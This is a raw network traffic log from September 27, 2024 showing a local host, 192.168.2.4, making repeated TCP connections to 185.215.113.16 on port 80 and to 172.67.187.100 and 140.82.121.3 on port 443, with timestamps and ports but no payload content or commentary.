                                                                                                                                                                Sep 27, 2024 17:42:45.836682081 CEST49825443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:45.836689949 CEST44349825172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:46.427062988 CEST8049826185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:46.427407980 CEST4982680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:46.474534988 CEST4982680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:46.479477882 CEST8049826185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:46.704027891 CEST8049826185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:46.704082966 CEST4982680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:46.817687035 CEST4982680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:46.818115950 CEST4982780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:46.822999001 CEST8049827185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:46.823065042 CEST4982780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:46.823219061 CEST8049826185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:46.823262930 CEST4982680192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:46.824382067 CEST4982780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:46.829421997 CEST8049827185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:46.871253967 CEST49828443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:46.871301889 CEST44349828172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:46.871360064 CEST49828443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:46.872107029 CEST49828443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:46.872124910 CEST44349828172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:47.359904051 CEST44349828172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:47.359982014 CEST49828443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:47.364626884 CEST49828443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:47.364645958 CEST44349828172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:47.365057945 CEST44349828172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:47.365978003 CEST49828443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:47.411396980 CEST44349828172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:47.538531065 CEST8049827185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:47.538597107 CEST4982780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:47.564946890 CEST4982780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:47.571041107 CEST8049827185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:47.798877001 CEST44349828172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:47.799012899 CEST44349828172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:47.799077034 CEST49828443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:47.804733992 CEST8049827185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:47.804805040 CEST4982780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:47.823606968 CEST49828443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:47.823637009 CEST44349828172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:47.823651075 CEST49828443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:47.823657036 CEST44349828172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:47.932101011 CEST4982780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:47.932416916 CEST4982980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:47.963970900 CEST8049827185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:47.965174913 CEST8049829185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:47.965240002 CEST4982780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:47.965286970 CEST4982980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:47.969048023 CEST4982980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:47.992849112 CEST8049829185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:48.715414047 CEST8049829185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:48.715471983 CEST4982980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:48.721458912 CEST4982980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:48.723124981 CEST49830443192.168.2.4140.82.121.3
                                                                                                                                                                Sep 27, 2024 17:42:48.723160982 CEST44349830140.82.121.3192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:48.723238945 CEST49830443192.168.2.4140.82.121.3
                                                                                                                                                                Sep 27, 2024 17:42:48.729926109 CEST49830443192.168.2.4140.82.121.3
                                                                                                                                                                Sep 27, 2024 17:42:48.729942083 CEST44349830140.82.121.3192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:48.734107018 CEST8049829185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:48.956645966 CEST8049829185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:48.956715107 CEST4982980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:49.153541088 CEST4982980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:49.153968096 CEST4983180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:49.165313959 CEST8049831185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:49.165539026 CEST4983180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:49.166328907 CEST8049829185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:49.169349909 CEST4982980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:49.309902906 CEST4983180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:49.314965963 CEST8049831185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:49.423377037 CEST49832443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:49.423427105 CEST44349832172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:49.423523903 CEST49832443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:49.424094915 CEST49832443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:49.424120903 CEST44349832172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:49.453998089 CEST44349830140.82.121.3192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:49.454062939 CEST49830443192.168.2.4140.82.121.3
                                                                                                                                                                Sep 27, 2024 17:42:49.456552982 CEST49830443192.168.2.4140.82.121.3
                                                                                                                                                                Sep 27, 2024 17:42:49.456564903 CEST44349830140.82.121.3192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:49.456939936 CEST44349830140.82.121.3192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:49.513376951 CEST49830443192.168.2.4140.82.121.3
                                                                                                                                                                Sep 27, 2024 17:42:49.559407949 CEST44349830140.82.121.3192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:49.575086117 CEST49833443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:49.575191975 CEST44349833172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:49.575279951 CEST49833443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:49.576093912 CEST49833443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:49.576131105 CEST44349833172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:49.871306896 CEST8049831185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:49.871407986 CEST4983180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:49.892885923 CEST4983180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:49.898241997 CEST8049831185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:49.941942930 CEST44349832172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:49.942015886 CEST49832443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:49.951535940 CEST49832443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:49.951558113 CEST44349832172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:49.951839924 CEST44349832172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:49.955956936 CEST49832443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:49.999420881 CEST44349832172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:50.083151102 CEST44349833172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:50.083242893 CEST49833443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:50.084501982 CEST49833443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:50.084527016 CEST44349833172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:50.084891081 CEST44349833172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:50.085870981 CEST49833443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:50.127413988 CEST44349833172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:50.157110929 CEST44349830140.82.121.3192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:50.160288095 CEST8049831185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:50.160366058 CEST44349830140.82.121.3192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:50.160439014 CEST44349830140.82.121.3192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:50.160466909 CEST49830443192.168.2.4140.82.121.3
                                                                                                                                                                Sep 27, 2024 17:42:50.160485029 CEST49830443192.168.2.4140.82.121.3
                                                                                                                                                                Sep 27, 2024 17:42:50.160469055 CEST4983180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:50.163753033 CEST49830443192.168.2.4140.82.121.3
                                                                                                                                                                Sep 27, 2024 17:42:50.217494965 CEST44349832172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:50.217601061 CEST44349832172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:50.217657089 CEST49832443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:50.218080044 CEST49832443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:50.218080044 CEST49832443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:50.218101025 CEST44349832172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:50.218111038 CEST44349832172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:50.270520926 CEST4983180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:50.271136999 CEST4983480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:50.292521000 CEST8049834185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:50.292632103 CEST4983480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:50.292896032 CEST8049831185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:50.292977095 CEST4983180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:50.296418905 CEST4983480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:50.301258087 CEST8049834185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:50.506676912 CEST44349833172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:50.506798029 CEST44349833172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:50.506860018 CEST49833443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:50.508985996 CEST49833443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:50.509035110 CEST44349833172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:50.509067059 CEST49833443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:50.509082079 CEST44349833172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:51.015335083 CEST8049834185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:51.015404940 CEST4983480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:51.016426086 CEST4983480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:51.023520947 CEST8049834185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:51.241101027 CEST8049834185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:51.241204023 CEST4983480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:51.350713968 CEST4983480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:51.351361990 CEST4983580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:51.355874062 CEST8049834185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:51.355930090 CEST4983480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:51.356467962 CEST8049835185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:51.356554031 CEST4983580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:51.359771013 CEST4983580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:51.364614964 CEST8049835185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:51.374659061 CEST49836443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:51.374702930 CEST44349836172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:51.374808073 CEST49836443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:51.375256062 CEST49836443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:51.375269890 CEST44349836172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:51.894952059 CEST44349836172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:51.895045042 CEST49836443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:52.086167097 CEST8049835185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:52.087430000 CEST4983580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:52.117333889 CEST49836443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:52.117358923 CEST44349836172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:52.117834091 CEST44349836172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:52.118597984 CEST49836443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:52.120803118 CEST4983580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:52.125653982 CEST8049835185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:52.163399935 CEST44349836172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:52.350513935 CEST8049835185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:52.350604057 CEST4983580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:52.460279942 CEST4983580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:52.460619926 CEST4983780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:52.465414047 CEST8049837185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:52.465614080 CEST8049835185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:52.465704918 CEST4983580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:52.465709925 CEST4983780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:52.465869904 CEST4983780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:52.470674992 CEST8049837185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:52.512883902 CEST44349836172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:52.513003111 CEST44349836172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:52.513140917 CEST49836443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:52.513329983 CEST49836443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:52.513344049 CEST44349836172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:52.513354063 CEST49836443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:52.513360023 CEST44349836172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:52.870645046 CEST49838443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:52.870687008 CEST44349838172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:52.870892048 CEST49838443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:52.871206045 CEST49838443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:52.871221066 CEST44349838172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.176367998 CEST8049837185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.176443100 CEST4983780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:53.177192926 CEST4983780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:53.182079077 CEST8049837185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.347132921 CEST44349838172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.347232103 CEST49838443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:53.349731922 CEST49838443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:53.349740982 CEST44349838172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.350074053 CEST44349838172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.350872993 CEST49838443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:53.395405054 CEST44349838172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.412367105 CEST8049837185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.412491083 CEST4983780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:53.520437002 CEST4983780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:53.520864964 CEST4983980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:53.525679111 CEST8049837185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.525738001 CEST8049839185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.525744915 CEST4983780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:53.525799036 CEST4983980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:53.533193111 CEST4983980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:53.538196087 CEST8049839185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.782495975 CEST44349838172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.782598972 CEST44349838172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.782789946 CEST49838443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:53.783166885 CEST49838443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:53.783179998 CEST44349838172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:53.783190966 CEST49838443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:53.783195019 CEST44349838172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.108501911 CEST49840443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:54.108597040 CEST44349840172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.108710051 CEST49840443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:54.109011889 CEST49840443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:54.109045029 CEST44349840172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.235832930 CEST8049839185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.237375021 CEST4983980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:54.567289114 CEST44349840172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.567405939 CEST49840443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:54.633291006 CEST4983980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:54.638523102 CEST8049839185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.701809883 CEST49840443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:54.701891899 CEST44349840172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.702240944 CEST44349840172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.703639030 CEST49840443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:54.747427940 CEST44349840172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.861355066 CEST8049839185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.861459970 CEST4983980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:54.942162991 CEST44349840172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.942255974 CEST44349840172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.943977118 CEST49840443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:54.944081068 CEST49840443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:54.944123030 CEST44349840172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.944158077 CEST49840443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:54.944174051 CEST44349840172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.976919889 CEST4983980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:54.977238894 CEST4984180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:54.982134104 CEST8049841185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.982300997 CEST8049839185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.982382059 CEST4983980192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:54.982399940 CEST4984180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:54.982584000 CEST4984180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:54.987555981 CEST8049841185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.999325037 CEST49842443192.168.2.4140.82.121.3
                                                                                                                                                                Sep 27, 2024 17:42:54.999378920 CEST44349842140.82.121.3192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:54.999449015 CEST49842443192.168.2.4140.82.121.3
                                                                                                                                                                Sep 27, 2024 17:42:55.003284931 CEST49842443192.168.2.4140.82.121.3
                                                                                                                                                                Sep 27, 2024 17:42:55.003304005 CEST44349842140.82.121.3192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.168757915 CEST49843443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:55.168828964 CEST44349843172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.168975115 CEST49843443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:55.169439077 CEST49843443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:55.169466972 CEST44349843172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.290050983 CEST49844443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:55.290106058 CEST44349844172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.290299892 CEST49844443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:55.291513920 CEST49844443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:55.291526079 CEST44349844172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.631442070 CEST44349843172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.631546021 CEST49843443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:55.632819891 CEST49843443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:55.632852077 CEST44349843172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.633119106 CEST44349843172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.633953094 CEST49843443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:55.636605978 CEST44349842140.82.121.3192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.636704922 CEST49842443192.168.2.4140.82.121.3
                                                                                                                                                                Sep 27, 2024 17:42:55.638483047 CEST49842443192.168.2.4140.82.121.3
                                                                                                                                                                Sep 27, 2024 17:42:55.638499022 CEST44349842140.82.121.3192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.638859034 CEST44349842140.82.121.3192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.679409981 CEST44349843172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.687861919 CEST8049841185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.688035965 CEST4984180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:55.688625097 CEST4984180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:55.693350077 CEST49842443192.168.2.4140.82.121.3
                                                                                                                                                                Sep 27, 2024 17:42:55.693352938 CEST8049841185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.739398003 CEST44349842140.82.121.3192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.766452074 CEST44349844172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.766525984 CEST49844443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:55.767837048 CEST49844443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:55.767848969 CEST44349844172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.768168926 CEST44349844172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.769021034 CEST49844443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:55.815406084 CEST44349844172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.899923086 CEST44349842140.82.121.3192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.902848005 CEST44349842140.82.121.3192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.902936935 CEST44349842140.82.121.3192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.902935028 CEST49842443192.168.2.4140.82.121.3
                                                                                                                                                                Sep 27, 2024 17:42:55.903026104 CEST49842443192.168.2.4140.82.121.3
                                                                                                                                                                Sep 27, 2024 17:42:55.905102015 CEST49842443192.168.2.4140.82.121.3
                                                                                                                                                                Sep 27, 2024 17:42:55.915740967 CEST8049841185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:55.915832043 CEST4984180192.168.2.4185.215.113.16
